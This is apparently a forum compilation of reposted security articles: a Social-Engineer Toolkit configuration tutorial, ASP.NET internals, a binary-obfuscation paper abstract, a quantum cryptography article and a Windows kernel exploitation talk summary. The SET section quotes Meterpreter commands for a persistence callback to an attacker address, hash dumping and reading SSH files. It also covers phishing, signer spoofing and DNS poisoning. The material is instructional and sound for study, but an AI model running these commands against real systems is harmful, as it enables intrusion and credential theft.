Nytro

[h=1]Phishing and Social Engineering Techniques 2.0[/h]Ahmed Mohamed May 22, 2013 This is the second part of the phishing and social engineering techniques series. In the first article, we have discussed what phishing is, as well as different types of phishing. We made a demo of a phishing attack using an email spoofing method to convince our victims to click on our links, and finally we had an overview about the Social Engineering Toolkit. Today we are going to talk in detail about the social engineering toolkit configuration, which allows us to customize our configuration according to the attack scenario. So being familiar with the configuration options will give you a view about the full features of SET to use these features to launch attack against our victims to convince them to provide the attacker all information that the attacker needs for further attack. What is social engineering? According to Wikipedia: Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information. This is a type of confidence trick for the purpose of information gathering, fraud, or computer system access. It differs from traditional cons in that often the attack is often a mere step in a more complex fraud. [h=1]Social-Engineer Toolkit[/h] The Social-Engineer (SET) was created and written by David Kennedy (ReL1K) and is an open-source python-driven tool that focuses solely on attacking the weakest link in the information security chain —the human element. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test. The Social-Engineer Toolkit(SET) is included in the latest version of the most popular Linux distribution focused on security— BackTrack. It can also be downloaded through GitHub using the following command: git clone https://github.com/trustedsec/social-engineer-toolkit/. [h=1]Social Engineering Toolkit Update[/h] The first step that we should take after installing BackTrack is updating the Social Engineering Toolkit. To do so, open the terminal and change directory to the SET directory, then enter the following command: root@bt:/pentest/exploits/set# svn update D config/set_config.py U config/set_config U config/update_config.py U setup.py A src/fasttrack/delldrac.py U src/fasttrack/mssql.py U src/powershell/powershell.py U src/core/set.py U src/core/payloadgen/create_payloads.py U src/core/setcore.py U src/core/dictionaries.py U src/core/menu/text.py U src/core/fasttrack.py U src/html/spawn.py U src/html/Signed_Update.jar.orig U src/html/unsigned/verified_sign.py U src/html/unsigned/unsigned.jar D src/webattack/java_applet U src/webattack/multi_attack/multiattack.py U src/webattack/harvester/scraper.py U src/webattack/harvester/harvester.py U src/webattack/browser_exploits/gen_payload.py D src/webattack/web_clone/linux D src/webattack/web_clone/osx A src/webattack/web_clone/applet.txt A src/webattack/web_clone/applet.database.old U src/webattack/web_clone/applet.database U src/payloads/set_payloads/shell.windows A src/payloads/set_payloads/pyinjector.binary U src/payloads/set_payloads/listener.py U set U readme/CHANGES U readme/CREDITS U readme/README Updated to revision 1599. [h=1]Social Engineering Toolkit configuration[/h] The power of SET is in its configuration file. SET using its default settings works perfectly for most users, but advanced customization will help us to make sure that the attack vectors run without problems. So after updating SET, it’s time to edit the SET configuration file. So let’s walk through it. To open SET configuration file, Open the terminal and change the directory to config folder under the SET directory, you will find the configuration file called set_config. Open it in any text editor. [TABLE] [TR] [TD=class: gutter]1 2 [/TD] [TD=class: code]### Define the path to MetaSploit, for example: /pentest/exploits/framework3 METASPLOIT_PATH=/opt/metasploit/msf3 [/TD] [/TR] [/TABLE] While looking through the configuration file, you can change any option to get the desired result. In the first option, you can change the path of where Metasploit is located. SET uses Metasploit for the payload creations, file format bugs, and for the browser exploit scenarios. By default, the Metasploit location is /opt/metasploit/msf3. [TABLE] [TR] [TD=class: gutter]1 2 [/TD] [TD=class: code]### This will tell what database to use when using the MetaSploit functionality. Default is PostgreSQL METASPLOIT_DATABASE=postgresql [/TD] [/TR] [/TABLE] In this option, you can choose which database Metasploit will use. By default, PostgresSQL is the default database. [TABLE] [TR] [TD=class: gutter]1 2 [/TD] [TD=class: code]### How many times SET should encode a payload if you are using standard MetaSploit encoding options ENCOUNT=4 [/TD] [/TR] [/TABLE] In this option, you can specify how many times Metasploit should encode the payload using the standard Metasploit encoding option. By default, it encodes four times before sending the payload. [TABLE] [TR] [TD=class: gutter]1 2 3 [/TD] [TD=class: code]### The browser, however can introduce buggy results when auto migrating. ### NOTE: This will make bypassuac not work properly. Migrate to a different process to get it to work. AUTO_MIGRATE=OFF [/TD] [/TR] [/TABLE] In this option, you can set auto_migrate option to on/off. ON means that the Meterpreter session will migrate to a different process. For example, if we got a Meterpreter session through a browser attack and the victim closed the browser, then the session will be dead. But if auto_migrate set to ON, the Meterpreter session will migrate to another running process so if the attacker closes the browser, the session is still live. [TABLE] [TR] [TD=class: gutter]1 2 3 4 [/TD] [TD=class: code]### Custom exe you want to use for Metasploit encoding, this usually has better av ### detection. Currently it is set to legit.binary which is just calc.exe. An example ### you could use would be putty.exe so this field would be /pathtoexe/putty.exe CUSTOM_EXE=legit.binary [/TD] [/TR] [/TABLE] In this option, you can determine which executable will be used for Metasploit encoding. By default, it’s set to legit.binary, which is calc.exe. [TABLE] [TR] [TD=class: gutter]1 2 3 4 [/TD] [TD=class: code]### This is for the backdoored executable if you want to keep the executable to still work. Normally ### when legit.binary is used, it will render the application useless. Specifying this will keep the ### application working BACKDOOR_EXECUTION=ON [/TD] [/TR] [/TABLE] In the next option we will determine if we want to keep the executable working. We specify this at custom_exe, which by default is calc.exe. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 [/TD] [TD=class: code]### Here we can run multiple Meterpreter scripts once a session is active. This ### may be important if we are sleeping and need to run persistence, try to elevate ### permissions and other tasks in an automated fashion. First turn this trigger on ### then configure the flags. Note that you need to separate the commands by a ; METERPRETER_MULTI_SCRIPT=OFF LINUX_METERPRETER_MULTI_SCRIPT=OFF [/TD] [/TR] [/TABLE] Here, we can run multiple Meterpreter scripts once a session is active. We can turn it off/on in the next option and specify these scripts. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 [/TD] [TD=class: code]### What commands do you want to run once a Meterpreter session has been established. ### Be sure if you want multiple commands to separate with a ;. For example you could do ### run getsystem;run hashdump;run persistence to run three different commands METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem LINUX_METERPRETER_MULTI_COMMANDS=uname;id;cat ~/.ssh/known_hosts [/TD] [/TR] [/TABLE] In this option, we can choose which commands will be run once a Meterpreter session has been established. If you want multiple commands, you can separate them with a semicolon “;”. [TABLE] [TR] [TD=class: gutter]1 2 3 4 [/TD] [TD=class: code]### This is the port that is used for the iFrame injection using the Metasploit browser attacks. ### By default this port is 8080 however egress filtering may block this. May want to adjust to ### something like 21 or 53 METASPLOIT_IFRAME_PORT=8080 [/TD] [/TR] [/TABLE] You can use this to determine which port will be used for the iFrame injection while using the Metasploit browser attacks. By default, it will use port 8080. It’s better to change it to a popular port like 2153, etc. ### Define to use Ettercap or not when using website attack only - set to ON and OFF ETTERCAP=OFF ### Ettercap home directory (needed for DNS_spoof) ETTERCAP_PATH=/usr/share/ettercap ### Specify what interface you want ettercap or DSNiff to listen on, if nothing will default ETTERCAP_INTERFACE=eth0 Ettercap is a free and open source network security tool for man in the middle attacks on a LAN. It can be used for computer network protocol analysis and security auditing. It runs on various Unix-like operating systems including Linux, Mac OS X, BSD and Solaris, and on Microsoft Windows. It is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols. The Ettercap options can be used when an attacker is on the same subnet as his victims and he wants to perform DNS poison attacks against a subset of IP addresses. When this flag is set to ON, it will poison the entire local subnet and redirect a specific site or all sites to your malicious server. There are three options for Ettercap. The first is used to allow SET to use Ettercap, and the second sets the path, and the third is to identify the interface on which Ettercap will listen. [TABLE] [TR] [TD=class: gutter]1 2 3 [/TD] [TD=class: code]### Define to use dsniff or not when using website attack only - set to on and off ### If dsniff is set to on, ettercap will automatically be disabled. DSNIFF=OFF [/TD] [/TR] [/TABLE] Dsniff is a set of password sniffing and network traffic analysis tools written by security researcher and startup founder Dug Song to parse different application protocols and extract relevant information. Dsniff passively monitors a network for interesting data (passwords, e-mail, files, etc.) In this option, you can allow the use of dsniff by setting it On/Off but take in your mind that Ettercap will automatically be disabled. [TABLE] [TR] [TD=class: gutter]1 2 [/TD] [TD=class: code]### SendMail ON or OFF for spoofing email addresses SENDMAIL=OFF [/TD] [/TR] [/TABLE] Sendmail is a general purpose internetwork email routing facility that supports many kinds of mail-transfer and -delivery methods, including the Simple Mail Transfer Protocol (SMTP) used for email transport over the Internet. By setting sendmail flag to ON, Sendmail can spoof source email addresses. Sendmail must be installed before set it to ON. It’s installed by default in back track 5. [TABLE] [TR] [TD=class: gutter]1 2 3 4 [/TD] [TD=class: code]### Create self-signed Java applets and spoof publisher note this requires you to ### install ---> Java 6 JDK, BT5 or Ubuntu users: apt-get install openjdk-6-jdk ### If this is not installed it will not work. Can also do: apt-get install sun-java6-jdk SELF_SIGNED_APPLET=OFF [/TD] [/TR] [/TABLE] If we set this option to ON, It will allow us to sign the java applet with whatever the name that we want. For example, if we are targeting a company called “XYZ”, you can sign the java applet with “XYZ” to make it look more believable. By default the java applet is signed by Microsoft this will require you to install java’s jdk. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 [/TD] [TD=class: code]### Use Apache instead of the standard Python web server. This will increase the speed ### of the attack vector. APACHE_SERVER=OFF ### Path to the Apache web root APACHE_DIRECTORY=/var/www [/TD] [/TR] [/TABLE] If we set this option to ON, SET will use the Apache web server to handle the web requests because it will increase the speed of the attack. By default SET will use Python web server and you should set the Apache root directory —which is /var/www by default. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 [/TD] [TD=class: code]# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR WEBATTACK_SSL=OFF # PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED) # YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT # IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED! SELF_SIGNED_CERT=OFF # BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK # SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem PEM_CLIENT=/root/newcert.pem PEM_SERVER=/root/newreq.pem [/TD] [/TR] [/TABLE] If you are targeting a website that uses “HTTPS” protocol for communication, it’s better to make your website use “HTTPS” too, Fortunately SET allows you to incorporate SSL based attacks with it so you will need to turn the webattack_ssl to ON. And set the second option to ON if you want to use self-signed certificates and the third and fourth options should refer to the location of the client and server certificates. [h=1]Conclusion[/h] The Social Engineering Toolkit is a powerful tool that allows the penetration tester to use against his victims to convince his victims to provide him with the required information for further attack. SET has many features that you can customize to help you to for your attack scenario. [h=1]References[/h] www.wikipedia.com www.social-engineer.org Sursa: InfoSec Institute Resources – Phishing and Social Engineering Techniques 2.0

The ASP.NET Internals Dejan Lukan May 23, 2013 ASP.NET Configuration Options The most important configurations in the web.config file will be described in this section: <authenticaton> The authentication tag is used at the application level and is used to identify the client. There are four authentication modes we can choose from when setting this element. Those modes are the following: None, Windows, Forms, Passport. If we don’t need any authentication, we can simply set the authentication mode to none. We can also use Windows authentication mode if we would like IIS to handle the authentication for us; in a usual scenario, the authentication credentials are sent to the IIS server, whose job is to check the validity of them and respond appropriately. The IIS gives us four standard authentication options that we can use: Anonymous, Basic, Digest and Windows integrated. Forms use web application forms to collect the user supplied username and password and validate them. With passport authentication, we’re actually using Microsoft’s Passport database to authenticate against, which is good because users don’t need to constantly re-register on various sites, but it costs a bit of money to use. Let’s take a look at the authentication tag as used by the default application, which can be created by the Visual Studio: <authentication mode=”Forms”> <forms loginUrl=”~/Account/Login.aspx” timeout=”2880? /> </authentication> We can see that we need to login with the Forms authentication mode if we’re trying to access the Account/Login.aspx website. This can be seen on the picture below, where we can clearly see that we need to input the right username and password to successfully authenticate: <authorization> The next important field is <authorization> that controls the clients’ access to the resources in the same directory. Inside this element, we can use either <allow> or <deny> elements, where both of them can be used to allow/deny access to users and resources. We can use different attributes with those two elements to give/deny the exact group of users certain permissions. The attributes are the following: - users: we can use a list of user names which we allow/deny access to certain resources, but there are also two other characters that have a special meaning. The ? character can be used to specify anonymous users, while all users are specified with the * character. - roles: we can specify a list of roles which are allowed/denied to access certain resource. - verbs: we can specify a list of HTTP methods to which the access is allowed/denied. Let’s take a look at the default Visual Studio application’s Account/directory that contains the following web.config configuration file: <?xml version="1.0"?> <configuration> <location path="Register.aspx"> <system.web> <authorization> <allow users="*"/> </authorization> </system.web> </location> <system.web> <authorization> <deny users="?"/> </authorization> </system.web> </configuration> In the above configuration, we’re specifying that all users are allowed access to the Register.aspx resource, while by default anonymous users are not allowed to access anything else. <compilation> The compilation element is used to define the compiler settings. There are a number of attributes that we can use with the compilation element, but the following are the most useful: - debug: specifies if the debugging information should be printed to web browser. - defaultLanguage: specifies in which language the application was written in. - targetFramework: specifies the ASP.NET target framework which is used to compile the application. Let’s take a look at the default Visual Studio application that contains the following <compilation> settings: <compilation debug="true" targetFramework="4.0" /> We’ve asked the application to print debugging information and telling it that it was compiled for the 4.0 ASP.NET target framework. We can also see this information in the project’s properties under the Application > Target framework setting. ScriptResource and WebResource From Microsoft ASP.NET 2.0, we can embed static files, like html files, css files, image files and scripts in assembly as .resources. But then we need a handle to access those resources, which is exactly what the WebResource.axd provides. This is why the WebResource.axd file is used to retrieve assembly resources and send them as a response to the request in a web browser. When we send a request to the WebResource.axd, the handler will look up the web resource identifier and try to load the assembly that contains the resource. If successful, it will get the data from the .resource assembly and send it to the client. The URL for WebResource.axd looks like this: WebResource.axd?d=<encrypted_id>&t=<time_stamp> The d parameter is used as an ID to request the resource we want, while the t parameter is the time stamp that is used to check whether the resource has changed from when it was last requested. The question arises: why would we even want to use WebResource.axd, when we can simply serve static files normally? The answer is that we can deploy web applications easier and faster because we need to deploy a smaller number of files, not to mention that we need to maintain them. Let’s take a look at the current default Visual Studio application’s files as they appear in the Solution Explorer; this can be seen on the picture below: We can see that we’re using a number of static files like jquery.js files, as well as the Site.css style sheet. To use WebResources.axd instead, we need to create a new directory called Resources/ at the document root of the web application (actually we can name the folder anything we want, but let’s just name it Resources as advised). Right click on the project and select Add New Folder and name the folder Resources. The project tree will now look like presented on the picture below: Notice that the Resources folder has been added to the list. After that, we need to add some static files to the Resources directory. We can do that by simply dragging and dropping; we’ll drag each jsquery.js script as well as the Site.css files to the newly created Resources directory. After that, the Scripts and Styles directories are not needed anymore and we can delete them. The new project’s tree structure now looks like this: If we try to restart the web page now, it shouldn’t load correctly, since we moved the css style sheet file. On the picture below, we can see that this is indeed true, because the css style sheet wasn’t read by the website, since it’s not available in the previous location anymore: If we look at the source code of the web page, we can see that it’s trying to access the Styles/Site.css CSS file, but obviously it can’t, since the web page doesn’t have any style applied to it. But let’s nevertheless try to access that file to check whether it’s available or not. On the picture below, we can clearly see that the Site.css file is unreachable. So we just proved that if we move the Site.css style sheet file to some other directory, the application won’t find it and the web page will not be able to load it; this isn’t exactly something new or hard to understand, but we’re doing it because we want to make a point that if we remove the Site.css now, the site won’t be able to use it, but we’ll later add it by using the WebResource.axd and that’s when the site should look like it did at the beginning, with the style sheet applied. So the first thing we need to do is to prepare the web resources that we’ve just added to the Resources directory. We need to select all of the files in there and right-click on them, then select Properties. The following windows should open: Clearly we can see that the Build Action is the setting we need to change. Notice at the bottom of the picture where it says that the Build Action option specifies how the file should be built and deployed. Currently the field holds a value Content, because each file we selected has this option set; remember that the files are loaded normally now, by linking to them in the HTML as follows: <link href="Styles/Site.css" rel="stylesheet" type="text/css" /> We need to change the Build Action to “Embedded Resource”, as can be seen on the picture below: Next, we need to register the resources as WebResource; we can do that with the WebResource attribute. We can place it in any .cs file, but it wouldn’t be very good if we would have web resources registered in various places. For this reason, it’s best to register all files in the Properties/AssemblyInfo.cs file by using the WebResource attribute. The syntax for registering resources as WebResource in any .cs file is as follows: [assembly: WebResource("webresource_name", "content_type")] The webresource_name is the name of the resource that we’re trying to embed in the assembly. The content_type is the MIME type of the resource. First we need to put the following line on the top of the AssemblyInfo.cs to enable the use of the WebResource: using System.Web.UI; After that, we can register the resources normally with the WebResource. To register all previously moved static files we can write something like the following code and add it at the end of the AssemblyInfo.cs file: /* * Web Resources */ [assembly: WebResource("WebApplication1.Resources.Site.css", "text/css")] [assembly: WebResource("WebApplication1.Resources.jquery-1.4.1-vsdoc.js", "text/javascript")] [assembly: WebResource("WebApplication1.Resources.jquery-1.4.1.js", "text/javascript")] [assembly: WebResource("WebApplication1.Resources.jquery-1.4.1.min.js", "text/javascript")] Notice that the name of the resources is comprised with the project name, which is WebApplication1, followed by the folder name Resources where they are located, followed by the actual name of each resource. The second argument is the MIME type of each resource that is sent as a Content-Type HTTP header in a response and may be used by the web browser in various ways. We used the “text/css” MIME type for style sheets, while the JavaScript files use the “text/javascript” MIME type. We’ve just registered our added resources as web resources, but we still have to get the URL of each resource to be able to access them. We already said that before the web page used the following code to request the resource, which is then downloaded and applied to the web page. <link href="Styles/Site.css" rel="stylesheet" type="text/css" /> This wouldn’t work now, however, since the resources have been relocated to some other file and it’s not defined as a Content resource anymore, but as an EmbeddedResource. This is why we need to access it differently, with the use of the WebResource.axd script that accepts the d parameter, which is the ID of the resource we would like to access. But how do we get the value of the d parameter, which is needed to access the resource? This can be done by calling the GetWebResourceUrl function that accepts two arguments: the first argument specifies the type of the server-side resource and a resource name. To use this method, we must first create the instance of the ClientScriptManager class to which the function belongs. We can put that in the Default.aspx.cs file, which can then look like this: namespace WebApplication1 { public partial class _Default : System.Web.UI.Page { void Page_Init(object sender, EventArgs e) { ClientScriptManager cs = Page.ClientScript; HtmlLink myHtmlLink = new HtmlLink(); myHtmlLink.Href = cs.GetWebResourceUrl(typeof(SiteMaster), "WebApplication1.Resources.Site.css"); cs.RegisterClientScriptResource(typeof(SiteMaster), "WebApplication1.Resources.Site.css"); myHtmlLink.Attributes.Add("rel", "stylesheet"); Page.Header.Controls.Add(myHtmlLink); string[] resourceNames = Assembly.GetExecutingAssembly().GetManifestResourceNames(); foreach (string res in resourceNames) { Debug.WriteLine("Resource name: "+res); } } } } We loaded the “WebApplication1.Resources.Site.css” CSS resource and added it to the header of the web page. At the end of the function, we’re also printing all the resources to verify if they got loaded successfully. If we run the application now, we should see that the CSS file is indeed loaded and working. We’ve just used the WebResource.axd to get access to our CSS resource file; we won’t repeat the steps for the JavaScript files, because they are primarily the same. If there are any problems loading the resource files, we can download Reflector, that’s accessible here: .NET Reflector - Understand and debug any .NET code, and look inside the generated DLL files located in the bin/ directory of the application. The .NET Reflector looks like the picture below: If we look at the WebApplication1, we can clearly see that the path to the resources is correct, as can also be seen on the picture below: If the resources are still not loaded correctly, there’s a nice tip here: asp.net - WebResource Hell - resource cannot be found - Stack Overflow It suggests that we should call GetWebResourceUrl function with the type of our .master file. In our case, the master file contains the class SiteMaster, which we should use as the first parameter to the GetWebResourceUrl function. After that, everything should work just fine. Let’s verify that the CSS files have indeed been loaded successfully. On the picture below we can see that we’ve accessed the CSS file through the WebResource.axd and that the CSS is actually visible and being read correctly. We can see that we can successfully get our hands on the resources with using the WebResource.axd, which is located at document root, according to the URIs in the source of a web page. However, there isn’t actually a WebResource.axd file in the document root of the application; this is because .axd files are implemented as HTTP handlers, so they don’t exist as an ASP.NET web page. If we look at the web.config configuration file accessible in C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\Config directory, we can see the following, which directly relates to our WebResource.axd handler: <add path="WebResource.axd" verb="GET" type="System.Web.Handlers.AssemblyResourceLoader" validate="True" /> If a request comes from to the WebResource.axd, use the AssemblyResourceLoader HTTP handler to handle the request. This fully explains that the WebResource.axd file is just a HTTP handler implemented by the .NET framework to take requests and return the resources from the assembled files. Conclusion We’ve seen how we can embed static files inside the compiler assembly file, which enabled us to have every static resource available in a single file. This was a more complete introduction to the WebResource.axd and ASP.NET, and this is the basis to understanding the Oracle Padding attack. Sursa: InfoSec Institute Resources – The ASP.NET Internals

Advanced Cryptography Description: In this video Bill Buchanan talks about Advanced Cryptography so he is going to cover topics like, Fundamentals of Crypto, Encryption, Private Key, Passing Keys, Public Key, Private Key for ID. PKI, Hashing One Time Password, MAC, Secure Functions, etc .. He will cover almost all popular encryption method. Download Codes and PDF & tools : http://www.asecuritysite.com/Encryption Sursa: Advanced Cryptography

Dynamic Malware Analysis Description: In this video you will learn how to perform a Dynamic Malware Analysis using ollydbg tool. Dynamic Malware analysis is a very risky task because you are running that piece malware into your system and checking what exactly that malware is doing and after that you start analysis the process and connections for evidence or other use. In this video he is running a Zeus Botnet. Sursa: Dynamic Malware Analysis

Mimimorphism: A New Approach to Binary Code Obfuscation Zhenyu Wu, Steven Gianvecchio, Mengjun Xie, and Haining Wang Abstract Binary obfuscation plays an essential role in evading malware static analysis and detection. The widely used code obfuscation techniques, such as polymorphism and metamorphism, focus on evading syntax based detection. However, statistic test and semantic analysis techniques have been developed to thwart their evasion attempts. More recent binary obfuscation techniques are divided in their purposes of attacking either statistical or semantic approach, but not both. In this paper, we introduce mimimorphism, a novel binary obfuscation technique with the potential of evading both statistical and semantic detections. Mimimorphic malware uses instruction-syntax-aware high-order mimic functions to transform its binary into mimicry executables that exhibit high similarity to benign programs in terms of statistical properties and semantic characteristics. We implement a prototype of the mimimorphic engine on the Intel x86 platform, and evaluate its capability of evading statistical anomaly detection and semantic analysis detection techniques. Our experimental results demonstrate that the mimicry executables are indistinguishable from benign programs in terms of byte frequency distribution and entropy, as well as control flow fingerprint. Full paper (387 KB) appeared in Proceedings of the 17th ACM Conference on Computer and Communications Security (CCS'10). http://www.cs.wm.edu/~adamwu/Mimimorphism_CCS10/Mimimorphic.pdf Download Presentation slides (for PowerPoint 2007+, 1.12 MB) http://www.cs.wm.edu/~adamwu/Mimimorphism_CCS10/ZhenyuWu_CCS2010_Mimimorphism.pptx Experimental data 7th order 100 mimimorphic instances (bz2 tar package, 127 MB) http://www.cs.wm.edu/~hnw/Mimimorphic/MimicOrder7.tar.bz2 8th order 100 mimimorphic instances (bz2 tar package, 169 MB) http://www.cs.wm.edu/~hnw/Mimimorphic/MimicOrder8.tar.bz2 Note: These mimimorphic instances are NOT standalone executables. They are the mimimorphic payloads, which consist of sequences of mimicry instructions that encode a piece of randomized data. In a standalone mimimorphic executable, if we were to make one, each piece of payload will be merged with the decoder binary and put into the ".text" section of the executable. Maintained by: Zhenyu Wu Last modified: Mon Apr 30 18:16:22 EDT 2012 Sursa: Mimimorphism: A New Approach to Binary Code Obfuscation

[h=2]Cryptography[/h] [h=3]The solace of quantum[/h][h=1]Eavesdropping on secret communications is about to get harder[/h] May 25th 2013 CRYPTOGRAPHY is an arms race between Alice and Bob, and Eve. These are the names cryptographers give to two people who are trying to communicate privily, and to a third who is trying to intercept and decrypt their conversation. Currently, Alice and Bob are ahead—just. But Eve is catching up. Alice and Bob are therefore looking for a whole new way of keeping things secret. And they may soon have one, courtesy of quantum mechanics. At the moment cryptography concentrates on making the decrypting part as hard as possible. The industry standard, known as RSA (after its inventors, Ron Rivest, Adi Shamir and Leonard Adleman, of the Massachusetts Institute of Technology), relies on two keys, one public and one private. These keys are very big numbers, each of which is derived from the product of the same two prime numbers. Anyone can encrypt a message using the public key, but only someone with the private key can decrypt it. To find the private key, you have to work out what the primes are from the public key. Make the primes big enough—and hunting big primes is something of a sport among mathematicians—and the task of factorising the public key to reveal the primes, though possible in theory, would take too long in practice. (About 40 quadrillion years with the primes then available, when the system was introduced in 1977.) Since the 1970s, though, the computers that do the factorisation have got bigger and faster. Some cryptographers therefore fear for the future of RSA. Hence the interest in quantum cryptography. Alice, Bob and Werner, too? The most developed form of quantum cryptography, known as quantum key distribution (QKD), relies on stopping interception, rather than preventing decryption. Once again, the key is a huge number—one with hundreds of digits, if expressed in the decimal system. Alice sends this to Bob as a series of photons (the particles of light) before she sends the encrypted message. For Eve to read this transmission, and thus obtain the key, she must destroy some photons. Since Bob will certainly notice the missing photons, Eve will need to create and send identical ones to Bob to avoid detection. But Alice and Bob (or, rather, the engineers who make their equipment) can stop that by using two different quantum properties, such as the polarities of the photons, to encode the ones and zeros of which the key is composed. According to Werner Heisenberg’s Uncertainty Principle, only one of these two properties can be measured, so Eve cannot reconstruct each photon without making errors. If Bob detects such errors he can tell Alice not to send the actual message until the line has been secured. One exponent of this approach is ID Quantique, a Swiss firm. In collaboration with Battelle, an American one, it is building a 700km (440-mile) fibre-optic QKD link between Battelle’s headquarters in Columbus, Ohio, and the firm’s facilities in and around Washington, DC. Battelle will use this to protect its own information and the link will also be hired to other firms that want to move sensitive data around. QuintessenceLabs, an Australian firm, has a different approach to encoding. Instead of tinkering with photons’ polarities, it changes their phases and amplitudes. The effect is the same, though: Eve will necessarily give herself away if she eavesdrops. Using this technology, QuintessenceLabs is building a 560km QKD link between the Jet Propulsion Laboratory in Pasadena, California, which organises many of NASA’s unmanned scientific missions, and the Ames Research Centre in Silicon Valley, where a lot of the agency’s scientific investigations are carried out. A third project, organised by Jane Nordholt of Los Alamos National Laboratory, has just demonstrated how a pocket-sized QKD transmitter called the QKarD can secure signals sent over public data networks to control smart electricity grids. Smart grids balance demand and supply so that electricity can be distributed more efficiently. This requires constant monitoring of the voltage, current and frequency of the grid in lots of different places—and the rapid transmission of the results to control centres. That transmission, however, also needs to be secure in case someone malicious wants to bring the system down. In their different ways, all these projects are ambitious. All, though, rely on local fixed lines to carry the photons. Other groups of researchers are thinking more globally. To do that means sending quantum-secured data to and from satellites. At least three groups are working on this: Thomas Jennewein and his team at the Institute for Quantum Computing in Waterloo, Canada; a collaboration led by Anton Zeilinger at the University of Vienna and Jian-Wei Pan at the University of Science and Technology of China; and Alex Ling and Artur Ekert at the Centre for Quantum Technologies in Singapore. Dr Jennewein’s proposal is for Alice to beam polarisation-encoded photons to a satellite. Once she has established a key, Bob, on another continent, will wait until the satellite passes over him so he can send some more photons to it to create a second key. The satellite will then mix the keys together and transmit the result to Bob, who can work out the first key because he has the second. Alice and Bob now possess a shared key, so they can communicate securely by normal (less intellectually exhausting) terrestrial networks. Dr Jennewein plans to test the idea, using an aircraft rather than a satellite, at some point during the next 12 months. An alternative, but more involved, satellite method is to use entangled photon pairs. Both Dr Zeilinger’s and Dr Ling’s teams have been trying this. Entanglement is a quantum effect that connects photons intimately, even when they are separated by a large distance. Measure one particle and you know the state of its partner. In this way Alice and Bob can share a key made of entangled photon pairs generated on a satellite. Dr Zeilinger hopes to try this with a QKD transmitter based on the International Space Station. He and his team have been experimenting with entanglement at ground level for several years. In 2007 they sent entangled photon pairs 144km through the air across the Canary Islands. Dr Ling’s device will test entanglement in orbit, but not send photons down to Earth. If this sort of thing works at scale, it should keep Alice and Bob ahead for years. As for poor Eve, she will find herself entangled in an unbreakable quantum web. Sursa: Cryptography: The solace of quantum | The Economist

[h=2]NoSuchCon’13 and crashing Windows with two instructions[/h]The first edition of the NoSuchCon security conference held in Paris ended just a few days ago. Before anything else, I would like to thank all of the organizers (proudly listed at nosuchcon.org) for making the event such a blast! Both the location, venue and speaker line-up were amazing, with lots of free beer and wealth of people to chat with. Overall, I am very happy to have shown up there and I will definitely make sure to attend the second edition of the conference. Other than drinking, discussing 0-days and visiting Paris, I also had the pleasure to give a talk about the usual subject – Windows kernel security. The exact title of my presentation was “Abusing the Windows Kernel: How to Crash an Operating System With Two Instructions“, and touched on the subject of several different exploitation techniques, internal CPU related behavior and security vulnerabilities (all related to the Windows operating system) that I discovered during the course of last several weeks / months. While the slide deck was made available to the attendees right at the beginning of my talk at nosuchcon.org/talks (great idea!), I’m reposting them here anyway, in case you haven’t had a chance to take a look yet. In fact, a majority of the talks were interesting and highly technical, so be sure to check the available material for all presentations ;-) Download Slides: “Abusing the Windows Kernel: How to Crash an Operating System With Two Instructions” (3.3MB, PDF) KiTrap0e advisory: “Abusing Windows NT #PF Trap Handler to Bugcheck and Leak Information” I originally planned to address six separate topics, but due to time constraints I decided to skip some of them in favor of the other ones. A brief description of each technique and vulnerability follows below. “nt!memcpy (and the like) reverse copying order” – certain implementations of the memcpy, memmove, RtlCopyMemory and RtlMoveMemory found in the kernel and third-party drivers alike handle the “overlapping regions” corner case by reversing the copy process order from the intuitive left-to-right to right-to-left direction. By starting to write at the end of the destination memory region, the functions facilitate successful exploitation of certain buffer overflow vulnerabilities, by allowing a (relative) write-what-where condition to be provoked. . While the technique works best for a kernel ? user copy on 64-bit platforms, it can also be applied to a number of other scenarios. For more information, please refer to the “Memory Copy Functions in Local Windows Kernel Exploitation” article published last year in the Hack in the Box Magazine, Issue 009. The Proof of Concept source code of a vulnerable device driver and an exploit used during live demonstration can be found at memcpy_ioctl.zip (3.9kB, ZIP). Note that the code has only been confirmed to be suspectible to a stack cookie bypass when built with WDK 7600.16385.1 for Windows 7 (x64 Free Build), although it should generally work for any 64-bit target. . “nt!memcmp double-fetch” – an interesting behavior found in the Windows 8 32-bit implementation of the nt!memcmp standard function, making it possible to fake matching regions when a user-mode pointer is passed as one of the function’s parameters. Due to lack of time, this was not covered at NSC; however, our SyScan’13 slides and paper explain the problem thoroughly. . “PAGE_GUARD and kernel code execution flow” – a technique already described in the “Fun facts: Windows kernel and guard pages” and “A story of win32k!cCapString, or unicode strings gone bad.” blog posts. . “SegSs, LDT_ENTRY.HighWord.Bits.Default_Big and IRETD” – due to how the “Big“ LDT entry flag in the SS: segment descriptor is handled by the IRETD instruction used for cross-privilege-level transfers in Windows, it is possible to have the CPU disclose the upper 16 bits of the current thread’s kernel stack pointer in 32-bit versions of Windows. . Proof of Concept source code: small_seg.zip (1kB, ZIP). . Example output: Z:\>smallseg.exe [+] High word of kernel stack address: 94070000 Z:\>smallseg.exe [+] High word of kernel stack address: 94010000 Z:\>smallseg.exe [+] High word of kernel stack address: 956b0000 “Windows 32-bit Trap Handlers” – the lack of proper sanitization of the previous CPL inside several trap handlers used in 32-bit Windows can be leveraged to disclose addresses of several internal ntoskrnl.exe (or equivalent) symbols in the kernel address space, effectively defeating kernel ASLR (not that it matters much for this particular OS). . Proof of Concept source code: kitrap01.zip (1.3kB, ZIP) and kitrap0e_addr.zip (1.4kB, ZIP). . Example outputs: 